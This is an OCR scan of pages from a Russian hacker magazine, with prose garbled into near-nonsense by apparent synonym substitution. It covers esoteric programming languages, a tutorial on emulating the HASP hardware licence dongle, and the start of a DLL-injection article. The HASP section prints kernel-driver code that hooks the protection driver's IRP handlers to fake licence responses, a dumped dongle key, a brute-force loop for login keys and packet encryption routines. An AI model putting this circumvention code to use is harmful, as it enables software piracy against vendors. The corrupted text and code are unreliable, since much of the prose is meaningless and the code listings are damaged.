HQ9++ Некоторые ЭЯП являются как никогда <<шутливыми языками>>, само генерация которых было своего рода шуткой, например, язычишко

На9+ . Этот шлепало безвыгодный является полным до Тьюринг у, да на нем поглощать всего-навсего 0 команды, собственно, по образу необходимо с названия, сие Н, а. 0 и+ . Шутка юмора заключается во книжка , что-нибудь первую программу hello Пример программы с целью архитектуры

URISC, из командой SUBLEQ

woгld, которую пиш ут все, начиная смотреть новейший шлепало , безграмотный век

попросту написать. Например, во ассемблере сие может бытовать весьма нетривиальная задача. В этом но языке команды означают следую­ щее:

VAR'AQ

Команда Н по сути дела исключать вывеска << Hello woгld>>. Команда а умозаключение первоначальный КОД самой программы. Команда 0 выводит болтовня стихотворения <<99 бутылок лежало для

Известно, аюшки? многие программисты любят Staг tгack [вспомнить добро бы

стене».

бы оный а ситком Big Bang Тhеогу.- При м. редактора!, благодаря тому не велено

А команда+ увеличивает сверху единицу счетчик, который, nравда ,

повернуться спиной языкиснечеловеческой логикой, например, звякало Vaг'aq,

нигде паче пустить в ход нельзя, nотому зачем команд чище нет.

основанный в логике Клин гонов. Он был создан Брайеном Коннорсом

равно Крисом Прессей на

0000 году.

В нем nрисутствуют стандартные тиnы

данных, равно как равно во обычных языках: числа, строки, списки да функции. Язык основывается сверху Po5t5cгipte, равным образом во нем глотать простейшие положения Li5p'a,

Язык На9++, гласный вдобавок в качестве кого << На9+ со Классами>>, является обьектно-ориентированной версией , созданнай Девидом Морган­

Марам [David Moгgan-maгl. В ней добавлена новая команда,++, которая увеличивает контролер двоечка раза равно создае т объект. В соответ­

однако, на предпочтение с привычных английских корней, до сей времени команды с годами

ствии от принципом сокрытия информации, дорога для этому объекту

до невозможности Клингонские, начиная форму дневной журнал цифр.

невозможен.

Ниже приведе н ломоть программы, которая считает числа фибоначи.

Кроме того, существует язычина На9±, во котором в области сравнению с На9н добавлен оператор·-· с целью проверки правильнести програм­

А В

(*

boq

latlh cha' В

"А"

cher

Посчитать сумму А равно В

(* (* (*

Распечатать сумма

Сохранить А на В

мы. Результатыпроверки зависят с местонахождения оператора.

*)

продублировать последствие

*)

*)

*)

Подобны х языков, на книжка числе русских вариантов сего языка, было создано ужас много, а басить в рассуждении практическом применении данных команд далеко не случается .

BEFUNG

UNLAMBDA

Существует такого типа наружность языков вроде фунгеоидные . Это многомерные

Unlambda является минимизированным функциональным языком,

языки, на которых схема программы невыгодный является линейной. Они

основанным получи лямбда-исчислении, во котором существуют лишь только

хватает постоянно безграмотный являются Тьюринг-полными , но на них могут

семь операторов. Основные операторы: 0, k и·- делают его полным

реализовываться принциnиально кое-кто способы построения про­

по части Тьюрингу. В привычном понимании всегда функции языка принимают

грамм, а самочки они помогают разделить абстрактное мышление.

едва соответственно одному аргументу, да и то нате практике они nрименяют таково

Самым известным языком сего будто является befunge.

называемый путь карринга . Карринг-это путь преобразования

Целью его создания, сообразно утверждению автора, была создание

функции через двух аргументов таким образом, дай тебе функционирование принима­

языка, максимально сложного чтобы компиляции. Синтаксис достаточ­

ла доводы за одному. Если у в от питаться связка F [x,yl, в таком случае да мы со тобой можем

только сложный, потому-то автор невыгодный буду доводить его весь, скажу только, что такое?

представить, который Fl xl -

принциnиально симпатия схож от bгainfuck, все сверх команд << двигать­

Таким образом, я можем использовать функцию F[xl для <<у» да избавить­

ся о десную равным образом влево» убирать до настоящий поры команды <<двигаться книзу да вверх», зачем

ся через необходимости функции с двух аргументов [главное- пом­

делает его полноценно дв ухмерным языком.

нить, ась? круг обязанностей возвращает безвыгодный значение, а другую функцию!.

Следующий адрес реализует бессрочный цикл, зачем допускается разгадать

сие далеко не значение, а в свой черед некоторая функция.

Основой языка является аппликатор<<'>>, что означает, сколько

никуда не денешься воспользоваться следующую следовать ним функцию.

дажепоеговнешнемувид~

Функция<<.>> выводит обозначение в морда равным образом н литоринх возьми лишь про при­ дания языку хоть бы небольшага практического значения.

Функция «i>> возвращает следующее вслед за ней значение, в частности

ix вернет х. А во приближенно выглядит

<<he llo woг ld » :

Эти три функции, казалось бы, вполне бесполезны, однако самое интересное впереди.

<< hel1o wor1d >> Befunge-93

бери двумерном,

малограмотный Тьюринг-полном языке

Функция <<k>> принимает неуд аргумента [методом каррингаl да воз­ вращает первый.

Последняя занятие <<5>>. У нее еще три аргумента. В итоге функ­

v

v ~"""""Hello"< >48*, v vJJJJJJ"World!"< >25*,@

ХАКЕР

01/154/2011

ция

«'''sxyz»

применяет функцию «Х» для «Z», после «у» для «Z», а попозже

применяет полученные на итоге функции союзник ко др угу.

· r " " · " " " . Н. е .1.1. о. . w. о. r .1. di

005


КОДИНГ

Даниил Бершацкий

lbepshatskylagmail.coml

ЭМУЛИРУЕМ КЛЮЧ

АППАРАТНОЙ ЗАЩИТЫ

HASP

В этой статье описаны способы обхода аппаратных систем защиты. В качестве примера рассмотрена

методика

HASP [Нагdwаге Against Softwaгe Рiгасу), разработанная компанией Aladdin Knowledge Systems Ltd . В прошлом данная методика являлась одной с

самых популярных аппаратных систем защиты ПО.

ВЗГЛЯНЕМ Утрируя, не запрещается сказать, ась?

HASP состоит с двух частей: аппарат­

утнапиштим равно программ ной. Аппаратная часть- сие электронный ключик на виде USВ-брелка, РСМСIА-карты, LТР-девайса либо — либо вообще внутренней РСI-карты. Установленный софт достаточно потеть над чем только на пирушка машине, на которую воткнут электронный ключ. Собственно, неплохо было бы отучитьсофтот подобный неприятной ради кошелька привычки. Программная часть- сие драйвера электронного ключа и различный софт, привязывающий электронные ключи из их драй­ верами напрямую для защищаемому продукту тож для каким-то

зашифрованным данным. В статье наш брат рассмотрим равно обойдем вслед за прикрытие у, использующую USВ-брелок- наверное, в особенности популярный электронный отпирка возьми сей дня .

буется дамп ключа, а замена данных осуществляется иначе, а

именно- во nрограммной эмуляции. То вкушать шофер после щиты сможет

МЕХАНИЗМ СИСТЕМЫ ЗА

писать со виртуальным ключом таково же, на правах равно из физическим .

Сам брелки нас под безвыгодный интересует, во лента через ПО во его комплек­ те. Для нас первый промежду равных беспокойство представляет узел haгdlock.sys.

ПЕРЕХВАТ И ЭМУЛЯUИЯ

Не углубляясь на подробности, отмечу, который текущий водитель отвечает

Как уж отмечалось, суперидея перехвата состоит во перезаписи обра­

из-за сольватация из аппаратным ключом. Он имеет неуд объекта

ботчиков IRР-пакетов. Для сего нельзя не вмещать достижимость

устройства, единовластно изо которых обладает символьным именем \Device\

модифицировать полина структуры DRIVER_OBJECT. К счастью, существует

FNTO. Используя текущий объект, защищенное присовокупление через

ипостась loGetDevicePointeг, которая возвращает обозначение получи спинар

диспетчера ввода-вывода проверяет лицензию нате употребление

вершины стека именованных устройств да индикатриса нате соответству­

данного ПО.

ющий файловый объект. Вот кусок заключение функции, побег т анавливаю­

Гл авным недостатком этакий системы защиты является возмож­

щей ловушку:

ность пер ехвата вызовов диспетчера ввода-вывода да эмулирова ния

аппаратного ключа. Существует вот и все разновидность разработки драйвера виртуального ключа, однако сие куда как больше сложная техническая за­

дача, чем перехват вызовов. Как тебе известно, трафарет драйвера описывается на структуре DRIVER_OBJECT рядом загрузке модуля. Она

NTSTATUS HookDevice(LPWSTR lpDevice) UNICODE_STRING DeviceName; PDEVICE_OBJECT DeviceObject; PFILE_OBJECT FileObject ;

хранит конгломерат обработчиков сообщений. Причем пустое место безграмотный мешает переписать сии адреса равно заразиться управление, выполнив выше- код.

Таким образом, допускается перетягивать равно подменивать IRР-пакеты, под­ ставляя лицензионные показатели . Другими словами, имея дамп ключа

RtlinitUnicodeString(&DeviceName, lpDevice); IoGetDeviceObjectPointer(&DeviceName, lu , &FileObject, &DeviceObject);

защиты, позволяется подать его программ е, проверяющей верность лицензионных данных! Дл мы эксплуатации другого метода тоже тре-

006

Получив стрелка для структуру

DEVICE_OBJECT, имеем указа-

ХАКЕР

01/154/2011


AntiHASP

тель держи

DRIVER_OBJECT. Теперь

заменим адреса обработчиков равно

DevкcrrccVJ 08 Dr1vcr Vot'W OSR5 Devtce.slldDro\11!r lxplorer

[.=- ~~ ('g

функций выгрузки драйвера в свои: DRV v

NTSTATUS HookDevice(LPWSTR lpDevice) gDriverObject=DeviceObject-> DriverObject;

(lrl'>llllld)

DRV ~

DRV DRV 'IJr'iwof\/IO'IJW. DRV DRV ~· DRV ~\&.dlti.Ь

gDeviceCoпtrol=

gDriverObject- > MajorFunction[ IRP_MJ_DEVICE_CONTROL]; gDriverObject- > MajorFunction[IRP_MJ_DEVICE_CONTROL] HookDispatch;

DRV DRV -

gDriverUnload=gDriverObject->DriverUnload; gDriverObject->DriverUnload=HookUnload;

\DeW:eolнтo

о_,н._

\Dorwor\Н~

о._оь.к:t

IW'fB&o\488

rso!МC'8.

OW.Oto,ect~D"'"T~ HeotO...C.:

~S~Sn;

H..... Ccui:O

~

DRV ~'ICI*;t: DRV ~OIIC!Ьttt

Pme!Co.rt:

VcD.

с:о.-.т-.:

01110'1110010000

DRV -

Al«nndo- I!)(DDJЦI

DRV ~'Io*-'

0

lмmxm

0 Оре~..:е:

,( )IJ

;r---

,Qo&.CO

OpcReou~n;~ Opo::N~ . ~.~--

()IJ

O..IICienclocl::

Qiiixmj))-

п.

(М4О

"""'"'

""""""

oo-

DRV op;..\oifoooiOtd DRV DRV DRV ~

DRV - -

ginternalDeviceControl=gDriverObject-> MajorFunction[ IRP_MJ_INTERNAL_DEVICE_CONTROL]; gDriverObject-> MajorFunction[ IRP_MJ_INTERNAL_DEVICE_CONTROL]=HookDispatch;

о-н-=

DEV

\DeYa~Yd

-~~~~~~~~~~~~

0 E..-.tion"*-*on

Dew:8ld

DRV DRV DRV \Drlver\НffP DRV -

DRV

VJnwor\,lmllcS.

ORV ~

DRV DRV ~'jwcro

о.-сг o-:eDI ГD...-D2

Г Doci<D8Yc8

Гtho).oe~D

DRV - -

Г~ГR-.ы.

DRV ~\Iaioo8

ГEfi'CIS~

DRV ~\jCSetOO

DRV - -

ГWаЬrоС800 ГW11t6at/J1 ГWW/101f()2 ГWtW'IOif03

.........

DRV 'prlvoer~ DRV ~\Мo:Ui.МIJ

DRV 'Prw.~

DRV -

ObfDereferenceObject(FileObject); В последней строчке вызывается назначение OЫDeгefeгenceObject,

Утилита

WDK во действии. Дополнительная сведения об устройстве

которая умень шает доля ссылок получи файловый объект. Это необ хо­ димо действовать в целях корректной выгрузки драйвера, воеже невыгодный было прибыль

Э десь происходит исправление полей вместе с труктуры

DRIVER_

ресурсов да аналогичных ошибок . Так как бы обозначение получи и распишись вещь драйвера

OBJECT,

да п ере дает ся у правл ен равно е держи беспримерный адрес выгр узки

после щиты сох ран ен, то, дабы скинуть л ову шк у, нужно не мудрствуя лукаво воссоздать

драйвера перехваченного устройст ва. Аналогично поступаем , ежели

прежние обработчики IRР-пакетов:

выше- парус завершает работу прежде сис темы защиты . Только нуж ­

void UnhookDevice(void) gDriverObject- > MajorFunction[IRP_MJ_DEVICE_CONTROL] gDeviceControl; gDriverObject-> MajorFunction[ IRP_MJ_INTERNAL_DEVICE_CONTROL]=glnternalDeviceControl; gDriverObject->DriverUnload=gDriverUnload;

gHookUnload.

да выпростать захваченные р есу рсы равно далеко не возбуждать побереженный

ПЕРЕХВАТЧИК Зная основные правила пр ос т ей шего пере хва та IRР-пак е тов, приступим для реализации ноне только лишь самого перехватчика на простор ­

нейшего анализа. Для сего соз дадим объек т драйвера , тот или другой со­

д ержит символьное титул [например Конечно, нужно приплюсовать соответствующие проверки возьми достоверность

\ DosDevices\ Hook)

да т стекла входа

CREATE, CLOSE, READ.

указате лей равным образом прочееТеп ер ь что поделаешь претворить в жизнь правильную вы­ грузку драйверов. Так по образу режим защиты сообразно каким-либо причинам мо­ жет доделать свою работу прежде нашего драйвера , то, ради избежать краха системы из- з а неверных указателей, обработаем зто дело во

функции HookUпload :

void HookUnload(PDRIVER_OBJECT DrvObj) UnhookDevice(); gDriverUnload(DrvObj);

IoCreateDevice(DriverObject, е , &usDeviceName, FILE_DEVICE_NULL, е , е , &pDeviceObject); IoCreateSymbolicLink(&usSymbolicDeviceName, &usDeviceName); DriverObject->MajorFunction[IRP_MJ_CREATE]=DriverDispatch; DriverObject- >MajorFunction[IRP_MJ_CLOSE]=DriverDispatch; DriverObject->MajorFunction[IRP_MJ_READ]=DriverDispatch; DriverObject->DriverUnload=DriverUnload; Это нужно на того, так чтобы сидеть не без; нашим пере х ватчиком равно как из

файлом , используя функции CгeateFile\ReadFile\CioseHaпdle. При такой реализации обмена данными в кругу приложением равным образом перехватчиком не­

'Jj dump- Блокнот Ф1йл

Пр1ека

Форм1т

Вид

что от ра зу а отослать их читатель ской программе, позтому

tnpaeк.!ll

.(~~~iё~~;~~~~~~~~\SYSTEМ\Curr entcontr о1set \ Servi ces \ v; г ua 0наsр \ Dump]

нуждаться организовать некоторую структуру с целью хранения необходимых данны х в отношении пойманном шаг кете . Например односвязный список, в качестве кого зто

''owner''•''someowner ·· "created"•" Ol . 01.2005 00:00"

реализовано мной. Теперь не без; ледуе т определиться, какую информацию

" туре" ·dwor d: 00000001 "нemory" -т-ю г d: 00000001

н ужно буферизировать. Это шаболда извещение что касается движение кете [тип, флаги,

"seci on"-hex: 09,42 , 0 S, 06, al, е2, eS, еб

;;~~~~~~~h~;~g~ ~ g~: g~: ~~: ~~: g~: ~~: gg: gg :~~: ~~: ~: ~~, с9

пр очее) и, конечно, буферы . Также не возбраняется наболтать период перехвата.

"oata"• hex : 01 , 00,00 ,00 , 00 , 00,00, 00 , 0с, 08,68, е9 ,а2 ,ad,b3 ,2а, 0f ,dб,2а, f9,01,42, \ fb, 02, Зf ,с9 ,45, 05 ,Ьа , 03, 06, 0b,da,Oa, 07, fв ,ОЬ ,Of, 01 ,Ы, в1,0е ,41, 09 ,ld, Ы, 06, \ 4a, d7 ,45, 06,13,07,44, 03 , dd, 09,02, 09 ,d9, 0f ,d5 ,2d,42, 05,23, с3 ,43 ,е7 ,61, е9, а1, \ ed, 07 ,а5 ,15 ,1 в, fd, 04 ,с9 ,ев, 0в, 03, с3 , 0с, 0с, 0a,Of, ff ,Ь5, 0Ь, 0f, 09,ef ,15 ,49, 06, \

0"s~~~~i,.:в h:~:~~;~g;~} ;}~ ;g~;~~ ; ~~; f~ ;~~; ~~;~~, 0е,в3 ,ьв ,40, 04 ,Of ,60 ,ll,bc, 07, \

08 , 09, S1,a4 ,62 ,76 ,29 ,69,82 ,е2, 00, 0S, еЬ, Sb, сО, искусник ,11,04 ,el,4 S, 08,43 ,Ь1,Ы., 0.4 , \ 02,16,04 ,ев, 03, 00,27, 03 , ае, 01, cl,ld, fб, 0b,Od, 01, 0в,1е, 04 ,61,20, 05,09 ,d2 ,61 , \ аО, 07,41,45 ,19, в6, 05 ,00, 03, 01,ed , 04, 01, 00, 0с ,Od ,ов, f9,4c ,6а,О2 ,40,1О,в6 , f7, \ 30,1О,ОЬ ,eO , cd , аз, 00,81,24 ,82 , а3 ,а4 ,42, ео, 00,10,9e,df ,ьо, 00,98 ,бa,dS ,41 , 08 , \ се ,d4 ,72 ,bS, 0с ,8а,17, SО,б8 ,ef, Sб, 09, el, 00,бS , lf, 0с, 08, f4 , 07 , 03 ,d0,01,07 ,Оа , \ 54 ,11, 0с ,46 , Se, а4 ,91,eS, еЬ , dc ,82, Sb,25, 08, S8,10,4S , 0 0,8с ,lb ,OO , бl,la, Sa, 04, \ 22 ,2 0,sc,n.~.29,3a,Sб,~,e0,32 ,3 0,3a,ce , e7,cd,~,W.2l,Ob,ee,82,c2,~.~. \

02 , 0S, 0d,13 ,23, 01 , 08 ,е0,89 ,16,01 , ае,ОЗ, 0a , 0S ,4а, 01,18,Ьа,28,с7 , a.l, Sl,Sd ,48, \ е5, 0d, с6, 0f ,аа, 09 ,d9 ,02, е4 ,12 ,cl , fd, 0c,al, 0d,OO, fl, 0a,d0, 01,06 ,в2, 00,95 ,се, \ е а , во,10, 01 ,в5 ,4а,О1 ,01 ,01 ,01

CтplS, стп611

При копировании содержимого буферов нужно заметить себе об равно х типе ,

иначе- крах. Забегая вперед, отмечу, в чем дело? водитель защиты исполь зует буферизированный ввод-вывод, зто крошечку упрощает код.

HookDispatch if (idlTail- >IrpData.InputLength) { idlTail- >InputBuffer=ExAllocatePool(NonPagedPool, idlTail->lrpData.InputLength); RtlCopyMemory(idlTail->lnputBuffer, Irp- >Associatedlrp.SystemBuffer, idlTail->lrpData.InputLength);

Код

} nример дампа ключа

ХАКЕР

01 / 054/2011

007


КОДИНГ

if (IoSL->MajorFunction==IRP_MJ_DEVICE_CONTROL) Status=pHookedDriverDispatch(IRP_MJ_DEVICE_CONTROL)( DeviceObject, Irp); if (idlTail->IrpData.Outputlength) { idlTail->OutputBuffer=ExAllocatePool(NonPagedPool, idlTail-> IrpData.Outputlength); RtlCopyMemory(idlTail->OutputBuffer, lpBuffer, idlTail->IrpData.Outputlength);

idlTemp=idlHead- >ldlNext; ExFreePool(idlHead); idlHead=idlTemp; if

(!idlТemp ) idlТail=

NULL;

Когда переимщик подшофе , запускаем первоначально его, а затем­

из-за щищенное прило жение вместе с ключами равно без. Из полученных логов

}

становится видно, какие у правляющие коды посылаются равно их ре­

Осталось исполнить прочитывание изо драйвера. Так как бы пачка со­ держит буферы, чье со держимое представляет интерес, в таком случае размер

зультаты. Также дозволительно видеть, аюшки? после просы равно ответы получай двуха различ­

ных заключение [9с402450, 0с4024а0) отнюдь не изменяются . Казалось бы, позволяется

сообщений прежде неизвестен. Поэтому поступим следующим

базировать графоаналитический эмулятор, да по прошествии серии ради п усков убежда­

образом: подле первом чтении получаем общую информацию в отношении пакете равным образом

емся, что-то сие ладожское озеро зможно, этак как бы содержание буферов различно, равно

размере буферов; около повторном читаем содержимое, удаляем схема

неизвестно, вроде оно образуется.

с списка движение кетов равно малограмотный забываем относительно спиновые блокировки для того по­

Затем возможны н есколько вариантов дальнейши х действи й:

следовательной работы из данными:

проходить глухомань драйвера защиты;

DriverDispatch Length=IoSL->Parameters.Read.Length; if (Length==sizeof (IRP_DATA) && idlHead) RtlCopyMemory(Irp- >UserBuffer, &idlHead- >IrpData, Length); else if (idlHead && Length==_ (idlHead-> IrpData.Inputlength + idlHead-> IrpData.Outputlength))

Оба варианта дают необходимую информацию. Итак, оказыва-

вос п ользоватьсяинформациейсамихразработчиковсистемы . Код

алгоритмом

AES [Ad vanced

Encгyptioп Standaгd). Логичной ц елью

является приобретение ключа шифрования .

Но кабы до этих пор сильнее усугубиться во овладение устройства системы защиты, в таком случае окажется, зачем аппаратный контролька имеет феноменальный номер и включает всю необходимую информацию, хотя к доступа ко нему требуются программные ключи .

{

RtlCopyMemory(Irp->UserBuffer, idlHead- > InputBuffer, idlHead- >IrpData.Inputlength); RtlCopyMemory((PVOID)(JULONG)Irp- >UserBuffer + idlHead- >IrpData.Inputlength), idlHead-> OutputBuffer, idlHead->IrpData.Outputlength); else if (Length

==

0 && idlHead)

if (idlHead- >InputBuffer) ExFreePool(idlHead->InputBuffer); if (idlHead- >OutputBuffer) ExFreePool(idlHead->OutputBuffer);

Перехваченные пакеты кроме ключа

008

ется, предмет пакетов кодекс уется публичным симметричным

Поэтому на певом месте , ась? нужно сделать, сие извлечь ключ. По став ­

ленную задачу может постановить общепринятый брутфорс:

unsigned short Кеу; unsigned char RefKey[ B], VerKey[ B]; for

(Кеу=е ; Кеу <=ex7fff, Кеу++) if (!HL_LOGIN(Key, 0, RefKey, VerKey)) { HL_LOGOUT(); Break;

Перехваченные пакеты не без; ключом

ХАКЕР

01 /154/2011


AntiHASP

тификатор , морские ворота подключения да где-то спустя некоторое время . Для сего поглощать функции,

for ( int i=ехвЕ ; i < exFF; i++) { *(WORD*)(Buffer + i) -=Seed; Seed=(Seed >> 05 ) 0 (5eed << 0 ); Seed +=*(WORD*)(Buffer + i) л i;

определенные разработчиками. Функции

}

return

Кеу;

Далее отпирка [MODAD) используетс пишущий эти строки на снятия дампа: тип, иден­

впредь до от тупны изо

HL_ LOGIN, HL_ LOGOUT HASP SDK к разработчиков приложений, защищенных

*((WORD*)Buffer + ехЬа )

для этой платформе , равно имеют следующие прототипы:

Seed;

} WORD HL_LOGIN(WORD ModAd, Word Access, Byte * RefKey, Byt *VerKey); WORD HL_LOGOUT( void );

} Видно, зачем алгорифм несравнимо сложнее, нежели всегдашний перенос равным образом исклю­ чающее <<ИЛИ». А чисто алгорифм дешифрования:

Первая ипостась служит в целях открытия сессии работы вместе с ключом

з ащиты чрез драйвера, вторая- завершает сессию. Это про­ т отипы старых версий

HASP SDK, да работают они да не без; новыми типами

для лючей , таково равно как разработчики обеспечили обратную противоречивость . Новый

API

всего ничего отличается через старого, равным образом сие никоим образом безвыгодный сказывает­

со автор в принципе работы брутфор са. Подробную документацию

Hasp API , готовые реализации брутфорса равно дампера ключей дозволительно сыскать

Код

Decrypt() void Decrypt(BYТE* Buffer) { WORD 0eed=*((WORD*)Buffer + ех5е ); WORD Ver *((WORD*)Buffer + ехЬа );

if (Ver) {

получи и распишись диске.

for ( int i=exFE ; i > exBD; i--) Seed -=*(WORD*)(Buffer + i) л i; 5eed=(Seed << 05 ) 0 (Seed >> 0 ); *(WORD*)(Buffer + i) +=Seed;

ОБРАБОТЧИК Те перь питаться целое необходимое ради корректной работы модуля. Оста­ л в отношении сь претворить в жизнь подстановку лицензионной информации . Причем можно схватывать только кое-кто IRР-пакеты. Здесь до этого времени уж за­ ви не без; ит ото конкретной версии ключа равным образом защищаемой программы. Дамп

for ( int i=ехвв ; i >=е ; i--) { Seed +=*(WORD*)(Buffer + i) л i; Seed=(Seed « 05 ) 0 (Seed » 0); *(WORD*)(Buffer + i) -=Seed;

ключа кризис миновал отнюдь не встраивать во драйвер, а заваливать подвижно из р е естра. Лучше зиждиться бери сейчас готовом перехватчике запро­

от ов , в такой мере склифосовский элементарнее отъюстировать программа , отправляя перехваченные/ под вместе с тавленные пакеты возьми оценка пользовательскому приложению.

Принципиально логика перехватчика полноте владеть эдакий вид:

NTSTATUS HookDispatch(): PIO_STACK_LOCATION Stack Irp-> Tail.Overlay.CurrentStackLocatioп; ULONG IoControlCode; i f (Stack->MajorFunction==14) { IoControlCode=Stack.DeviceioControl.IoControlCode; i f (IoControlCode !=Вх9с4В2458 ) { Return gDeviceControl(DeviceObject, Irp); else { Encrypt(Irp->Associatedirp.SystemBuffer); Crypt(Irp->Associatedirp.SystemBuffec,__Key, DumpMemoryl;

*((WORD*)Buffer + ехЬа )

Seed;

} Затем годится покамест единолично период преобразования данных, более сложный равно поуже целиком и полностью обусловливающийся через структуры запроса. Тут неграмотный

привыкать сверх дизассемблера, придется в области хлопотать на б да безграмотный равным образом поза­ имствовать капелька стих у создателей. Это непросто, этак как бы код драйвера защиты усильно обфусцирован , так некто малограмотный отличается раз­

нообразием уловок. Достаточно достаточно декомпилировать парус не полностью, а лишь только просто-напросто кое-кто кусочки кода.

В вывод отмечу, что-нибудь строй табличного эмулятора, основанного для перехвате DeviceloCoпtгol,- полно трудная за­

return STATUS_FAILED;

дача. Но ёбаный основа эмулятора позволяется эксплуатировать да получи другом

уровне взаимодействия: разбудить виртуальную USВ-шину. Пакет запроса ко драйверу находится на криптаванном виде, поэто­

м у на доступа для его содержимому надо расшифровать, а кроме

ЗАКЛЮЧЕНИЕ

зашифровать. Возникает вопрос: каким алгоритмом равно каким ключом

Это безграмотный беспримерный средство отвязаться ото системы защиты. Суще­

готово шифрование? Покопавшись во исходникахот создателей

ствуют равным образом другие, паче совершенные методы. Изложенные во статье

из истемы, дозволяется произвести нижеупомянутый исходный алгорифм шифро­

воззрения дозволено эксплуатнуть равным образом интересах анализа работы драйверов,

вания пакета:

перехватывая IRР-пакеты. Таким образом допускается прирастить далеко не бермудный

механизм на кровный основанный получи и распишись коленке настройка . Удачи! Код

I

Encrypt()

void Encrypt(BYТE * Buffer)

{ WORD Seed=*((WORD*)Buffer + ех5е ); WORD Ver *((WORD*)Buffer + ехЬа );

if (Ver) { for ( int i=е ; i < ехВ9 ; i++) { *(WORD*)(Buffer-±..i_) +=Seed; Seed=(Seed >> 05 ) 0 (Seed << 0); Seed -=*(WORD*)(Buffer + i) л i;

П рикла д ное

Hardlock.sys \ Device\FNTO

~

Dev1ceControl lnternaiDev1ceControl DriverUnload

i 1

приложен равно е

~::::::::::::::~~~~~~~~~~--~~

Проверка nодлинности

~

Выгрузкадрайвера

Antihas p.sys HookDispatch

0

HookUnload

0

Принцип работы эмулятора

ХАКЕР

01/154/ 0011

009


deeonis ldeeonis!Ogmail.coml

DLLхард­ кодинг ВНЕДРЯЕМ

CBOIODLL В ЧУЖУЮ ПРОГРАММУ Как твоя милость знаешь, основными типами файлов, которые служат

в целях выполнения программнога кода, во ОС ЕХЕ равно

DLL.

Windows

являются

Первые- сие вполне самостоятельные про­

граммы, которые кто хочешь абонент может швырнуть да посмотреть, что будет. Вторые- динамические библиотеки, которые изначально создавались на экономии памяти ради подсчёт того, почто существовали на

этой памяти во единственном экзем пляр е. Все программы использу­ ют

хоть умри составлять его вехе-файл равно ждать, когда-никогда юзер кликнет в области нему на проводнике.

Не хоть лопни его причислять

да на автозагрузку

Windows

не ведь — не то

абортировать на системном реестре

DLL вроде

легальные программы приводить в исполнение

что подина руку попадет наше запрограммированное

исполняемых

nрограммист потребно имnортировать их. Это позволяется произвести двумя

файлов PortaЬie·

IPE): emanuai.ru/down· load/www.eManual. ru 0298.hlm l: • недурно написано ExecutaЬies

по отношению таблице имnорта :

rsdn ru/art jcle/baseserv/Deloader.xml.

сnособами.

КАК РАБОТАЕТ ИМПОРТ Для имnорта каких-либо функций исnользуется цементирование основ­

ного модуля nрограммы не без;

DLL, которая предоставляет сии функции.

Связывание случается двух видов: статическое не так — не то динамическое. Ина­ че говоря, в этапе комnиляции иначе говоря умереть и неграмотный встать миг выnолнения. Динами­ ческое обвязка выnолняет самовластно nрограмм ист. Для сего дьявол должен наnисать ряд строк заключение да возбудить пару АРI-функций, таких как Loadlibгaгy да GetPгocAddгess. Дело сие порядочно хлопотное,

• Hiew-must

где-то наравне функций ахти много, а кодер- один. Поэтому во основном

have пользу кого

используется стреноживание бери этапе компиляции.

всех, кто такой

работает не без; РЕ­

файлами: hiew.ru: • РЕТооls­ неплохая ту л вслед

на работы не без;

жажда около каждом своем

исполняемыми

запуске .

org.ru/Detools.shtml.

010

keгnel32.dll не в таком случае — не то useг32.dll, круглым счетом равно домашние собственные. Чтобы

вос nоль зоваться функциями, которые nредоставляет библиотека,

соответственно запуску бинарника. Можно красивее, заставив ни держи волос

liЬгагу, а точнее- функции, экспортируемые этими

• Формат

на поисках скрытых возможностей поступить незначительно хитрее равным образом

dynamic-link

библиотеками. Разнообразный софтиспользует равно как системные

Чтобы лукнуть частный код, невыгодный

файлами: ~

При статическом связывании загрузчик РЕ-файлов lто питаться кусок винды, многозначительный вслед за заnуск ехе'шников) определяет нужные для работы программы

DLL,

проецирует их на адресное nространство соз­

даваемого процесса да находит адреса импортируемых функций. Н о чтобы по сию пору сие произошло, компановщик исполняемых файлов должен создать во бинарнике особую структуру почти незатейливым названием

ХАКЕР

01/154/2011


DLL-хардкодинг

[!!] PL Tool. vr 0R

0

ЬуЩОх![шn] http 0/www uнк oul

----а

Dнectory [d1tot РЕ

Dlrectory Inforrмtions

г:::::"::УА'::-:-0

E-Di'ectory -Di'ectory ResotJ'ceDrec.tory Exception Di'ectory

Searty Di'ectory в.sе

Retoc...". т.ые

ОеООо

Ard'йec.tu'e

00000000

ooo "m.lC н

00007604

ООООООС8

-~ ·o~ ~D:.O.:(Io-'-o+..с.: ОООО89АС -'-'-":00000000

Specfic О«~

00000000

IJ:..

00000000

OOOOOOIC 00000000

ОООООА70

0000148<:

н

РЕ Edttor

JP.l '.o. :0 ,

не без; \wшdo""

-...-·s·o

rt

возлюбленный

0\nottp•d

ехе

~r Н н

RYAol GP

0090

0003

lntWCSv.U.

0000

.1

Reloc-.s

0000

T.Ы.olfset

0040

. '1 0

ol heoder

0004

оооо

Ched<sun

lntW!Pv.U.

--Di'ectory

tntW SS v.U.

Iщxrt

irйJISP vМJe

DesЩ>tors

ErЬyPort(RAW)'

сом·- desЩ>to<

".N,.....

0000189С

0

(IDHBIO

01

o-toy lrnport Directory

Мoxi'nun~ ~ OEМirl 0000 COJ8

Sections

000003<0

РЕ Addr

Sedion,[.text1

Reserved

()r9\alnrst1Ь.d 0001119!10

DIN.sne

~.... 5>EU32.cl WINSPOOL..DRY

00007840 00007980

coмcn32.cl

ОООО76ЕС

=i " : ..cl

=~

Гme/Datest«np -Chofn ......... .ffffffi'F. FffffFFf FFfffFfF

=

AP!Name

l'h.dRYA 00007990 00007'}94 00007'J98 0000799(:

i!1"\..ndows\systemЭ2\rpcrt4.cl

Fi-dreJCtW

....

PП<DioExW

i!)c,\..ndows\winsxs\x86_rnaosolt ...ndows.common-cor<rols_6595Ь64144cdl<f_6.0.ЖI0.6028J.-_61e65202\comdl32.d

~c,\..ndows\systemЗ2\ms'юt.cl i!]c,\..ndows\s'lstem32\oci32.cl

tlиi<.Ofket

......

00001МС

00007AFA ОООО783А

000078SE OOtXI706

00007008 Пиi<.У.....

00001174 00001284 00001020 OIXJ012EC 00001000

-

00006090 00006094 00006098

OIЖXJ7A7A

()(](F

00007ASE

0006 0012 0003 0008

00007А9Е

ООООбО9С

00007ASO

000079АО

ОООО6ОАО

00007А40

000079А4

000060А4

00007А8А

ОООА

Rej>loceTeJCtW

000079д8

IJOOIIбOA8

00007А6А

Conv~Щxtended&ror

ОООО79АС

00006DAC

ООСКJ7А14

0015 0004

GeiSovefieNameW

00007980

000061)8()

00007А2С

ооос

~c,\..ndows\system32\....-32.cl

-~

0074ЭООО

OOIIИOOO 0001К000

007'JOOOO 00063000 OOIIИOOO

00(][9000 OOIIИOOO

00035000 00011000

~

~ ~~

